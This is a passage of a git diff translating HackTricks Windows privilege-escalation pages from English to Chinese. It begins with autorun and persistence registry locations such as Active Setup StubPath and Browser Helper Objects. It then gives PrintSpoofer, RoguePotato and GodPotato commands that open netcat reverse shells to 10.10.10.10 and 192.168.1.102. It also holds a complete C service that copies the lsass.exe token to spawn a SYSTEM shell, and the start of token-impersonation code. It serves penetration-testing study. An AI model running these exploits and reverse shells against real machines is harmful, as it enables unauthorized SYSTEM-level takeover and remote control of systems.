+Active Setup 是 Windows 中的一个功能，它**在桌面环境完全加载之前启动**。它优先执行某些命令，这些命令必须在用户登录继续之前完成。此过程甚至在其他启动项（例如 Run 或 RunOnce 注册表部分中的项）被触发之前发生。
 
-Active Setup is a feature in Windows that **initiates before the desktop environment is fully loaded**. It prioritizes the execution of certain commands, which must complete before the user logon proceeds. This process occurs even before other startup entries, such as those in the Run or RunOnce registry sections, are triggered.
-
-Active Setup is managed through the following registry keys:
+Active Setup 通过以下注册表键进行管理：
 
 - `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`
 - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 - `HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components`
 - `HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components`
 
-Within these keys, various subkeys exist, each corresponding to a specific component. Key values of particular interest include:
+在这些键中，存在多个子键，每个子键对应一个特定组件。特别关注的键值包括：
 
 - **IsInstalled:**
-  - `0` indicates the component's command will not execute.
-  - `1` means the command will execute once for each user, which is the default behavior if the `IsInstalled` value is missing.
-- **StubPath:** Defines the command to be executed by Active Setup. It can be any valid command line, such as launching `notepad`.
+- `0` 表示该组件的命令将不会执行。
+- `1` 表示该命令将为每个用户执行一次，如果缺少 `IsInstalled` 值，则这是默认行为。
+- **StubPath:** 定义 Active Setup 要执行的命令。它可以是任何有效的命令行，例如启动 `notepad`。
 
-**Security Insights:**
+**安全洞察：**
 
-- Modifying or writing to a key where **`IsInstalled`** is set to `"1"` with a specific **`StubPath`** can lead to unauthorized command execution, potentially for privilege escalation.
-- Altering the binary file referenced in any **`StubPath`** value could also achieve privilege escalation, given sufficient permissions.
-
-To inspect the **`StubPath`** configurations across Active Setup components, these commands can be used:
+- 修改或写入 **`IsInstalled`** 设置为 `"1"` 的键，并具有特定的 **`StubPath`** 可能导致未经授权的命令执行，可能用于权限提升。
+- 更改任何 **`StubPath`** 值中引用的二进制文件也可能实现权限提升，前提是具有足够的权限。
 
+要检查 Active Setup 组件中的 **`StubPath`** 配置，可以使用以下命令：
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
 reg query "HKCU\SOFTWARE\Microsoft\Active Setup\Installed Components" /s /v StubPath
 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
 reg query "HKCU\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components" /s /v StubPath
 ```
+### 浏览器助手对象
 
-### Browser Helper Objects
+### 浏览器助手对象 (BHO) 概述
 
-### Overview of Browser Helper Objects (BHOs)
+浏览器助手对象 (BHO) 是 DLL 模块，为微软的 Internet Explorer 添加额外功能。它们在每次启动时加载到 Internet Explorer 和 Windows Explorer 中。然而，可以通过将 **NoExplorer** 键设置为 1 来阻止它们的执行，从而防止它们与 Windows Explorer 实例一起加载。
 
-Browser Helper Objects (BHOs) are DLL modules that add extra features to Microsoft's Internet Explorer. They load into Internet Explorer and Windows Explorer on each start. Yet, their execution can be blocked by setting **NoExplorer** key to 1, preventing them from loading with Windows Explorer instances.
+BHO 通过 Internet Explorer 11 与 Windows 10 兼容，但在较新版本的 Windows 中的默认浏览器 Microsoft Edge 中不受支持。
 
-BHOs are compatible with Windows 10 via Internet Explorer 11 but are not supported in Microsoft Edge, the default browser in newer versions of Windows.
-
-To explore BHOs registered on a system, you can inspect the following registry keys:
+要探索系统上注册的 BHO，可以检查以下注册表键：
 
 - `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
 - `HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects`
 
-Each BHO is represented by its **CLSID** in the registry, serving as a unique identifier. Detailed information about each CLSID can be found under `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`.
-
-For querying BHOs in the registry, these commands can be utilized:
+每个 BHO 在注册表中由其 **CLSID** 表示，作为唯一标识符。有关每个 CLSID 的详细信息可以在 `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}` 下找到。
 
+要在注册表中查询 BHO，可以使用以下命令：
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" /s
 ```
-
-### Internet Explorer Extensions
+### Internet Explorer 扩展
 
 - `HKLM\Software\Microsoft\Internet Explorer\Extensions`
 - `HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Extensions`
 
-Note that the registry will contain 1 new registry per each dll and it will be represented by the **CLSID**. You can find the CLSID info in `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}`
+请注意，注册表将为每个 dll 包含 1 个新的注册表项，并由 **CLSID** 表示。您可以在 `HKLM\SOFTWARE\Classes\CLSID\{<CLSID>}` 中找到 CLSID 信息。
 
-### Font Drivers
+### 字体驱动程序
 
 - `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers`
 - `HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers`
-
 ```bash
 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers"
 reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers"
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Font Drivers'
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers'
 ```
-
-### Open Command
+### 打开命令
 
 - `HKLM\SOFTWARE\Classes\htmlfile\shell\open\command`
 - `HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command`
-
 ```bash
 reg query "HKLM\SOFTWARE\Classes\htmlfile\shell\open\command" /v ""
 reg query "HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command" /v ""
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\command' -Name ""
 Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
 ```
-
-### Image File Execution Options
-
+### 图像文件执行选项
 ```
 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
 HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
 ```
-
 ## SysInternals
 
-Note that all the sites where you can find autoruns are **already searched by**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). However, for a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals:
-
+请注意，您可以找到 autoruns 的所有站点 **已经被**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) 搜索过。然而，对于 **更全面的自动执行** 文件列表，您可以使用来自 Sysinternals 的 [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)：
 ```
 autorunsc.exe -m -nobanner -a * -ct /accepteula
 ```
+## 更多
 
-## More
+**在** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2) **中找到更多类似的 Autoruns 注册表**
 
-**Find more Autoruns like registries in** [**https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2**](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
-
-## References
+## 参考文献
 
 - [https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref](https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/#gref)
 - [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
@@ -344,9 +314,8 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula
 
 <figure><img src="../../images/i3.png" alt=""><figcaption></figcaption></figure>
 
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
+**漏洞赏金提示**：**注册** **Intigriti**，一个由黑客为黑客创建的高级**漏洞赏金平台**！今天就加入我们，访问 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks)，开始赚取高达 **$100,000** 的赏金！
 
 {% embed url="https://go.intigriti.com/hacktricks" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index e398595ef..9c77b989b 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -2,12 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-> [!WARNING] > **JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`\*\* level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
+> [!WARNING] > **JuicyPotato 在 Windows Server 2019 和 Windows 10 build 1809 及之后的版本上无法工作**。然而， [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato)**,** [**EfsPotato**](https://github.com/zcgonvh/EfsPotato)**,** [**DCOMPotato**](https://github.com/zcgonvh/DCOMPotato)** 可以用来 **利用相同的权限并获得 `NT AUTHORITY\SYSTEM`\*\* 级别的访问权限**。这篇 [博客文章](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) 深入探讨了 `PrintSpoofer` 工具，该工具可用于在 JuicyPotato 无法工作的 Windows 10 和 Server 2019 主机上滥用模拟权限。
 
-## Quick Demo
+## 快速演示
 
 ### PrintSpoofer
-
 ```bash
 c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
 
@@ -22,23 +21,19 @@ c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
 NULL
 
 ```
-
 ### RoguePotato
-
 ```bash
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
 # In some old versions you need to use the "-f" param
 c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
 ```
-
 ### SharpEfsPotato
-
 ```bash
 > SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
 SharpEfsPotato by @bugch3ck
-  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
+Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
 
-  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
+Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.
 
 [+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
 df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
@@ -51,9 +46,7 @@ df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
 C:\temp>type C:\temp\w.log
 nt authority\system
 ```
-
 ### EfsPotato
-
 ```bash
 > EfsPotato.exe "whoami"
 Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
@@ -70,20 +63,17 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
 
 nt authority\system
 ```
-
 ### GodPotato
-
 ```bash
 > GodPotato -cmd "cmd /c whoami"
 # You can achieve a reverse shell like this.
 > GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
 ```
-
 ### DCOMPotato
 
 ![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
 
-## References
+## 参考文献
 
 - [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
 - [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
@@ -94,4 +84,3 @@ nt authority\system
 - [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
index 7b3e0046e..223b53314 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -1,12 +1,11 @@
 {{#include ../../banners/hacktricks-training.md}}
 
-The following code **exploits the privileges SeDebug and SeImpersonate** to copy the token from a **process running as SYSTEM** and with **all the token privileges**. \
-In this case, this code can be compiled and used as a **Windows service binary** to check that it's working.\
-However, the main part of the **code where the elevation occurs** is inside the **`Exploit`** **function**.\
-Inside of that function you can see that the **process **_**lsass.exe**_** is searched**, then it's **token is copied**, and finally that token is used to spawn a new _**cmd.exe**_ with all the privileges of the copied token.
-
-**Other processes** running as SYSTEM with all or most of the token privileges are: **services.exe**, **svhost.exe** (on of the firsts ones), **wininit.exe**, **csrss.exe**... (_remember that you won't be able to copy a token from a Protected process_). Moreover, you can use the tool [Process Hacker](https://processhacker.sourceforge.io/downloads.php) running as administrator to see the tokens of a process.
+以下代码**利用SeDebug和SeImpersonate权限**从一个**以SYSTEM身份运行的进程**中复制令牌，并且该进程具有**所有令牌权限**。\
+在这种情况下，这段代码可以编译并用作**Windows服务二进制文件**以检查其是否正常工作。\
+然而，**提升发生的主要代码部分**在**`Exploit`** **函数**内部。\
+在该函数内部，您可以看到**正在搜索进程**_**lsass.exe**_**，然后**复制其**令牌**，最后使用该令牌生成一个新的_**cmd.exe**_，并拥有复制令牌的所有权限。
 
+**其他以SYSTEM身份运行并具有所有或大部分令牌权限的进程**包括：**services.exe**、**svhost.exe**（最早的之一）、**wininit.exe**、**csrss.exe**...（_请记住，您将无法从受保护的进程复制令牌_）。此外，您可以使用以管理员身份运行的工具[Process Hacker](https://processhacker.sourceforge.io/downloads.php)查看进程的令牌。
 ```c
 // From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html
 #include <windows.h>
@@ -22,195 +21,193 @@ HANDLE stopServiceEvent = 0;
 //This function will find the pid of a process by name
 int FindTarget(const char *procname) {
 
-	HANDLE hProcSnap;
-	PROCESSENTRY32 pe32;
-	int pid = 0;
+HANDLE hProcSnap;
+PROCESSENTRY32 pe32;
+int pid = 0;
 
-	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
-	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
 
-	pe32.dwSize = sizeof(PROCESSENTRY32);
+pe32.dwSize = sizeof(PROCESSENTRY32);
 
-	if (!Process32First(hProcSnap, &pe32)) {
-			CloseHandle(hProcSnap);
-			return 0;
-	}
+if (!Process32First(hProcSnap, &pe32)) {
+CloseHandle(hProcSnap);
+return 0;
+}
 
-	while (Process32Next(hProcSnap, &pe32)) {
-			if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
-					pid = pe32.th32ProcessID;
-					break;
-			}
-	}
+while (Process32Next(hProcSnap, &pe32)) {
+if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+pid = pe32.th32ProcessID;
+break;
+}
+}
 
-	CloseHandle(hProcSnap);
+CloseHandle(hProcSnap);
 
-	return pid;
+return pid;
 }
 
 
 int Exploit(void) {
 
-    HANDLE hSystemToken, hSystemProcess;
-	HANDLE dupSystemToken = NULL;
-    HANDLE hProcess, hThread;
-    STARTUPINFOA si;
-    PROCESS_INFORMATION pi;
-	int pid = 0;
+HANDLE hSystemToken, hSystemProcess;
+HANDLE dupSystemToken = NULL;
+HANDLE hProcess, hThread;
+STARTUPINFOA si;
+PROCESS_INFORMATION pi;
+int pid = 0;
 
 
-    ZeroMemory(&si, sizeof(si));
-    si.cb = sizeof(si);
-    ZeroMemory(&pi, sizeof(pi));
+ZeroMemory(&si, sizeof(si));
+si.cb = sizeof(si);
+ZeroMemory(&pi, sizeof(pi));
 
-	// open high privileged process
-	if ( pid = FindTarget("lsass.exe") )
-		hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
-	else
-		return -1;
+// open high privileged process
+if ( pid = FindTarget("lsass.exe") )
+hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
+else
+return -1;
 
-	// extract high privileged token
-    if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
-        CloseHandle(hSystemProcess);
-        return -1;
-    }
+// extract high privileged token
+if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
+CloseHandle(hSystemProcess);
+return -1;
+}
 
-	// make a copy of a token
-	DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);
+// make a copy of a token
+DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);
 
-	// and spawn a new process with higher privs
-    CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",
-						NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
+// and spawn a new process with higher privs
+CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",
+NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
 
-    return 0;
+return 0;
 }
 
 
 void WINAPI ServiceControlHandler( DWORD controlCode ) {
-	switch ( controlCode ) {
-		case SERVICE_CONTROL_SHUTDOWN:
-		case SERVICE_CONTROL_STOP:
-			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
-			SetServiceStatus( serviceStatusHandle, &serviceStatus );
+switch ( controlCode ) {
+case SERVICE_CONTROL_SHUTDOWN:
+case SERVICE_CONTROL_STOP:
+serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-			SetEvent( stopServiceEvent );
-			return;
+SetEvent( stopServiceEvent );
+return;
 
-		case SERVICE_CONTROL_PAUSE:
-			break;
+case SERVICE_CONTROL_PAUSE:
+break;
 
-		case SERVICE_CONTROL_CONTINUE:
-			break;
+case SERVICE_CONTROL_CONTINUE:
+break;
 
-		case SERVICE_CONTROL_INTERROGATE:
-			break;
+case SERVICE_CONTROL_INTERROGATE:
+break;
 
-		default:
-			break;
-	}
-	SetServiceStatus( serviceStatusHandle, &serviceStatus );
+default:
+break;
+}
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 }
 
 void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
-	// initialise service status
-	serviceStatus.dwServiceType = SERVICE_WIN32;
-	serviceStatus.dwCurrentState = SERVICE_STOPPED;
-	serviceStatus.dwControlsAccepted = 0;
-	serviceStatus.dwWin32ExitCode = NO_ERROR;
-	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
-	serviceStatus.dwCheckPoint = 0;
-	serviceStatus.dwWaitHint = 0;
+// initialise service status
+serviceStatus.dwServiceType = SERVICE_WIN32;
+serviceStatus.dwCurrentState = SERVICE_STOPPED;
+serviceStatus.dwControlsAccepted = 0;
+serviceStatus.dwWin32ExitCode = NO_ERROR;
+serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
+serviceStatus.dwCheckPoint = 0;
+serviceStatus.dwWaitHint = 0;
 
-	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
+serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
 
-	if ( serviceStatusHandle ) {
-		// service is starting
-		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+if ( serviceStatusHandle ) {
+// service is starting
+serviceStatus.dwCurrentState = SERVICE_START_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		// do initialisation here
-		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
+// do initialisation here
+stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
 
-		// running
-		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
-		serviceStatus.dwCurrentState = SERVICE_RUNNING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+// running
+serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+serviceStatus.dwCurrentState = SERVICE_RUNNING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		Exploit();
-		WaitForSingleObject( stopServiceEvent, -1 );
+Exploit();
+WaitForSingleObject( stopServiceEvent, -1 );
 
-		// service was stopped
-		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+// service was stopped
+serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
 
-		// do cleanup here
-		CloseHandle( stopServiceEvent );
-		stopServiceEvent = 0;
+// do cleanup here
+CloseHandle( stopServiceEvent );
+stopServiceEvent = 0;
 
-		// service is now stopped
-		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
-		serviceStatus.dwCurrentState = SERVICE_STOPPED;
-		SetServiceStatus( serviceStatusHandle, &serviceStatus );
-	}
+// service is now stopped
+serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+serviceStatus.dwCurrentState = SERVICE_STOPPED;
+SetServiceStatus( serviceStatusHandle, &serviceStatus );
+}
 }
 
 
 void InstallService() {
-	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
+SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
 
-	if ( serviceControlManager ) {
-		TCHAR path[ _MAX_PATH + 1 ];
-		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
-			SC_HANDLE service = CreateService( serviceControlManager,
-							serviceName, serviceName,
-							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
-							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
-							0, 0, 0, 0, 0 );
-			if ( service )
-				CloseServiceHandle( service );
-		}
-		CloseServiceHandle( serviceControlManager );
-	}
+if ( serviceControlManager ) {
+TCHAR path[ _MAX_PATH + 1 ];
+if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
+SC_HANDLE service = CreateService( serviceControlManager,
+serviceName, serviceName,
+SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
+SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
+0, 0, 0, 0, 0 );
+if ( service )
+CloseServiceHandle( service );
+}
+CloseServiceHandle( serviceControlManager );
+}
 }
 
 void UninstallService() {
-	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
+SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );
 
-	if ( serviceControlManager ) {
-		SC_HANDLE service = OpenService( serviceControlManager,
-			serviceName, SERVICE_QUERY_STATUS | DELETE );
-		if ( service ) {
-			SERVICE_STATUS serviceStatus;
-			if ( QueryServiceStatus( service, &serviceStatus ) ) {
-				if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
-					DeleteService( service );
-			}
-			CloseServiceHandle( service );
-		}
-		CloseServiceHandle( serviceControlManager );
-	}
+if ( serviceControlManager ) {
+SC_HANDLE service = OpenService( serviceControlManager,
+serviceName, SERVICE_QUERY_STATUS | DELETE );
+if ( service ) {
+SERVICE_STATUS serviceStatus;
+if ( QueryServiceStatus( service, &serviceStatus ) ) {
+if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
+DeleteService( service );
+}
+CloseServiceHandle( service );
+}
+CloseServiceHandle( serviceControlManager );
+}
 }
 
 int _tmain( int argc, TCHAR* argv[] )
 {
-	if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
-		InstallService();
-	}
-	else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
-		UninstallService();
-	}
-	else  {
-		SERVICE_TABLE_ENTRY serviceTable[] = {
-			{ serviceName, ServiceMain },
-			{ 0, 0 }
-		};
+if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
+InstallService();
+}
+else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
+UninstallService();
+}
+else  {
+SERVICE_TABLE_ENTRY serviceTable[] = {
+{ serviceName, ServiceMain },
+{ 0, 0 }
+};
 
-		StartServiceCtrlDispatcher( serviceTable );
-	}
+StartServiceCtrlDispatcher( serviceTable );
+}
 
-	return 0;
+return 0;
 }
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index a6068b533..246f53e6e 100644
--- a/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/src/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -2,11 +2,10 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Code
-
-The following code from [here](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962). It allows to **indicate a Process ID as argument** and a CMD **running as the user** of the indicated process will be run.\
-Running in a High Integrity process you can **indicate the PID of a process running as System** (like winlogon, wininit) and execute a cmd.exe as system.
+### 代码
 
+以下代码来自 [这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**将进程 ID 作为参数指示**，并将以所指示进程的用户身份运行 CMD。\
+在高完整性进程中，您可以**指示以 System 身份运行的进程的 PID**（如 winlogon、wininit），并以系统身份执行 cmd.exe。
 ```cpp
 impersonateuser.exe 1234
 ```
@@ -18,134 +17,132 @@ impersonateuser.exe 1234
 #include <iostream>
 #include <Lmcons.h>
 BOOL SetPrivilege(
-	HANDLE hToken,          // access token handle
-	LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
-	BOOL bEnablePrivilege   // to enable or disable privilege
+HANDLE hToken,          // access token handle
+LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
+BOOL bEnablePrivilege   // to enable or disable privilege
 )
 {
-	TOKEN_PRIVILEGES tp;
-	LUID luid;
-	if (!LookupPrivilegeValue(
-		NULL,            // lookup privilege on local system
-		lpszPrivilege,   // privilege to lookup
-		&luid))        // receives LUID of privilege
-	{
-		printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
-		return FALSE;
-	}
-	tp.PrivilegeCount = 1;
-	tp.Privileges[0].Luid = luid;
-	if (bEnablePrivilege)
-		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-	else
-		tp.Privileges[0].Attributes = 0;
-	// Enable the privilege or disable all privileges.
-	if (!AdjustTokenPrivileges(
-		hToken,
-		FALSE,
-		&tp,
-		sizeof(TOKEN_PRIVILEGES),
-		(PTOKEN_PRIVILEGES)NULL,
-		(PDWORD)NULL))
-	{
-		printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
-		return FALSE;
-	}
-	if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
-	{
-		printf("[-] The token does not have the specified privilege. \n");
-		return FALSE;
-	}
-	return TRUE;
+TOKEN_PRIVILEGES tp;
+LUID luid;
+if (!LookupPrivilegeValue(
+NULL,            // lookup privilege on local system
+lpszPrivilege,   // privilege to lookup
+&luid))        // receives LUID of privilege
+{
+printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
+return FALSE;
+}
+tp.PrivilegeCount = 1;
+tp.Privileges[0].Luid = luid;
+if (bEnablePrivilege)
